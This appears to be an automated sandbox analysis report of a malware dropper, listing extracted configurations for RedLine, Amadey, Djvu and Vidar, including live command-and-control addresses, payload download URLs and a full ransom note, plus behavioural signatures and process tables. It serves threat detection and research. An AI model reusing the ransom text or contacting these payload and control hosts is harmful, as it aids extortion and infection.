amadey | 79cdd6cff18909c04eee46ba120ddfebbbbc59d47efc23c8458e11c3faad3bb3

Target

Setup.exe
Size

523KB
MD5

329acf4d6a5e735c1fd3b3fc6c77d3f3
SHA1

932598a6dbd5eaa0bd7b2aabd16f9c5fab62d960
SHA256

ebe82a7d2f2f9989a5e4ef6a4602a8224abdff7aef5baa6beacb5977c02ac3e0
SHA512

1c4b78f03238bd6e01abd14794c78ab5a27daf32c6a7237e814740f81c5892f4353f1145c71ad4fd1c57f5675a2281645de3fa437d78c05d5cc24c02f41cf4b5

Malware Config

Extracted

Family

redline

Botnet

SUSHI

65.108.101.231:14648

Attributes

auth_value
26bcdf6ae8358a98f24ebd4bd8ec3714

Extracted

Family

amadey

Version

3.10

185.215.113.38/f8dfksdj3/index.php

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.fefg
offline_id
eBNgvyGQV1Hmt9DBdxVRs8qPi1agsS7OaohPmit1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-j3AdKrnQie Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: admin@helpdata.top Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0482JIjdm

rsa_pubkey.plain

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Extracted

Family

redline

Botnet

ruz19486

193.124.22.34:19486

Attributes

auth_value
3340d2846ebdb18049b34a69b258c3ee

Extracted

Family

vidar

Version

52.1

Botnet

517

https://t.me/verstappenf1r

https://climatejustice.social/@ronxik312

Attributes

profile_id
517

Extracted

Family

redline

Botnet

gates

65.108.27.131:45256

Attributes

auth_value
be2b3d03bbbd8c9ec141783ea5b38be5

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/756-255-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/756-256-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/756-253-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/756-250-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3560-246-0x00000000023E0000-0x00000000024FB000-memory.dmp	family_djvu
behavioral1/memory/5368-322-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/5368-318-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5828	1828	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	1828	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1540-208-0x0000000000CE0000-0x0000000000EC0000-memory.dmp	family_redline
behavioral1/memory/1540-207-0x0000000000CE0000-0x0000000000EC0000-memory.dmp	family_redline
behavioral1/memory/1540-218-0x0000000000CE0000-0x0000000000EC0000-memory.dmp	family_redline
behavioral1/memory/1540-215-0x0000000000CE0000-0x0000000000EC0000-memory.dmp	family_redline
behavioral1/memory/2060-225-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/3828-262-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2368-269-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/6728-359-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/4744-341-0x0000000000400000-0x000000000044C000-memory.dmp	family_vidar
behavioral1/memory/4744-342-0x0000000000400000-0x000000000044C000-memory.dmp	family_vidar
behavioral1/memory/2364-345-0x0000000000600000-0x0000000000649000-memory.dmp	family_vidar
behavioral1/memory/4744-344-0x0000000000400000-0x000000000044C000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 20 IoCs

Processes:

NiceProcessX64.bmp.exeService.bmp.exeTrdngAnlzr1805.exe.exeprolivv.bmp.exeLzmwAqmV.exeOffscum.exe.exeSetupMEXX.exe.exechrome.exenorm2.bmp.exeFJEfRXZ.exe.exereal1801.bmp.exerrmix.exe.exefxdd.bmp.execmd.exearabcode_crypted_2.bmp.exeUnmaturedOddments.bmp.exeolympteam_build_crypted_2.bmp.exemixinte2001.bmp.exe6523.exe.exepen4ik_v0.7b__windows_64.bmp.exe

pid	process
4872	NiceProcessX64.bmp.exe
3444	Service.bmp.exe
4560	TrdngAnlzr1805.exe.exe
2416	prolivv.bmp.exe
1540	LzmwAqmV.exe
5076	Offscum.exe.exe
1536	SetupMEXX.exe.exe
3560	chrome.exe
2216	norm2.bmp.exe
4988	FJEfRXZ.exe.exe
1732	real1801.bmp.exe
3808	rrmix.exe.exe
4384	fxdd.bmp.exe
4400	cmd.exe
4968	arabcode_crypted_2.bmp.exe
5056	UnmaturedOddments.bmp.exe
3980	olympteam_build_crypted_2.bmp.exe
4284	mixinte2001.bmp.exe
4488	6523.exe.exe
4336	pen4ik_v0.7b__windows_64.bmp.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe	upx
C:\Users\Admin\Pictures\Adobe Films\pen4ik_v0.7b__windows_64.bmp.exe	upx

VMProtect packed file 7 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\norm2.bmp.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\fxdd.bmp.exe	vmprotect
behavioral1/memory/4384-236-0x0000000000530000-0x0000000000DF1000-memory.dmp	vmprotect
behavioral1/memory/4384-239-0x0000000000530000-0x0000000000DF1000-memory.dmp	vmprotect
behavioral1/memory/700-271-0x0000000000CF0000-0x00000000015B1000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Setup.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation Setup.exe
Loads dropped DLL 1 IoCs

Processes:

taskmgr.exe

pid process

5060 taskmgr.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2644 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 130.61.117.123

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Setup.exe

pid	process
2644	icacls.exe

description	ioc
Destination IP	130.61.117.123

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

FJEfRXZ.exe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	FJEfRXZ.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	FJEfRXZ.exe.exe

Drops Chrome extension 1 IoCs

Processes:

Setup.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\glmhhkoaglkboooplngidahblhiadpab\1.0.3_0\manifest.json	Setup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

235 ipinfo.io
301 api.2ip.ua
363 ipinfo.io
39 ipinfo.io
40 ipinfo.io
207 ipinfo.io
219 api.2ip.ua
208 ipinfo.io
221 api.2ip.ua
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
235	ipinfo.io
301	api.2ip.ua
363	ipinfo.io
39	ipinfo.io
40	ipinfo.io
207	ipinfo.io
219	api.2ip.ua
208	ipinfo.io
221	api.2ip.ua

Program crash 32 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4896	2216	WerFault.exe	norm2.bmp.exe
4168	4560	WerFault.exe	TrdngAnlzr1805.exe.exe
5692	1820	WerFault.exe	3AMCK.exe
5636	5464	WerFault.exe	rtst1077.exe
6020	5852	WerFault.exe	rundll32.exe
4100	6092	WerFault.exe	rundll32.exe
2368	4284	WerFault.exe	mixinte2001.bmp.exe
5772	2124	WerFault.exe	LzmwAqmV.exe
5420	1792	WerFault.exe	LzmwAqmV.exe
5428	4400	WerFault.exe	lokes.bmp.exe
6392	4284	WerFault.exe	mixinte2001.bmp.exe
6404	6088	WerFault.exe	logger2.exe
6664	4284	WerFault.exe	mixinte2001.bmp.exe
6880	4284	WerFault.exe	mixinte2001.bmp.exe
7128	4284	WerFault.exe	mixinte2001.bmp.exe
6324	3636	WerFault.exe	mixinte2001.bmp.exe
464	1492	WerFault.exe	AAH73.exe
5268	4284	WerFault.exe	mixinte2001.bmp.exe
6496	3636	WerFault.exe	mixinte2001.bmp.exe
4572	492	WerFault.exe	C7ECK.exe
5672	4284	WerFault.exe	mixinte2001.bmp.exe
6544	3636	WerFault.exe	mixinte2001.bmp.exe
6360	4284	WerFault.exe	mixinte2001.bmp.exe
4388	3636	WerFault.exe	mixinte2001.bmp.exe
5872	4284	WerFault.exe	mixinte2001.bmp.exe
5328	3636	WerFault.exe	mixinte2001.bmp.exe
3508	3808	WerFault.exe	rrmix.exe.exe
5144	1536	WerFault.exe	SetupMEXX.exe.exe
4660	4284	WerFault.exe	mixinte2001.bmp.exe
3376	3636	WerFault.exe	mixinte2001.bmp.exe
1848	3636	WerFault.exe	mixinte2001.bmp.exe
4276	1732	WerFault.exe	real1801.bmp.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4168 schtasks.exe
2460 schtasks.exe
3560 schtasks.exe
4516 schtasks.exe
4856 schtasks.exe
5460 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5068 timeout.exe
2248 timeout.exe

pid	process
4168	schtasks.exe
2460	schtasks.exe
3560	schtasks.exe
4516	schtasks.exe
4856	schtasks.exe
5460	schtasks.exe

pid	process
5068	timeout.exe
2248	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

6300 taskkill.exe
6348 taskkill.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

REG.exeREG.exe

pid process

3364 REG.exe
6148 REG.exe

pid	process
6300	taskkill.exe
6348	taskkill.exe

pid	process
3364	REG.exe
6148	REG.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Setup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Setup.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exeSetup.exeNiceProcessX64.bmp.exe

pid	process
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
2240	Setup.exe
2240	Setup.exe
5060	taskmgr.exe
2240	Setup.exe
5060	taskmgr.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
4872	NiceProcessX64.bmp.exe
5060	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

5060 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

3888 chrome.exe
3888 chrome.exe
3888 chrome.exe

pid	process
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

taskmgr.exe

description	pid	process
Token: SeDebugPrivilege	5060	taskmgr.exe
Token: SeSystemProfilePrivilege	5060	taskmgr.exe
Token: SeCreateGlobalPrivilege	5060	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
5060	taskmgr.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe
3888	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exechrome.exeNiceProcessX64.bmp.exe

description	pid	process	target process
PID 2240 wrote to memory of 3888	2240	Setup.exe	chrome.exe
PID 2240 wrote to memory of 3888	2240	Setup.exe	chrome.exe
PID 3888 wrote to memory of 2464	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 2464	3888	chrome.exe	chrome.exe
PID 2240 wrote to memory of 4872	2240	Setup.exe	NiceProcessX64.bmp.exe
PID 2240 wrote to memory of 4872	2240	Setup.exe	NiceProcessX64.bmp.exe
PID 4872 wrote to memory of 5060	4872	NiceProcessX64.bmp.exe	taskmgr.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 1152	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4200	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4200	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe
PID 3888 wrote to memory of 4844	3888	chrome.exe	chrome.exe

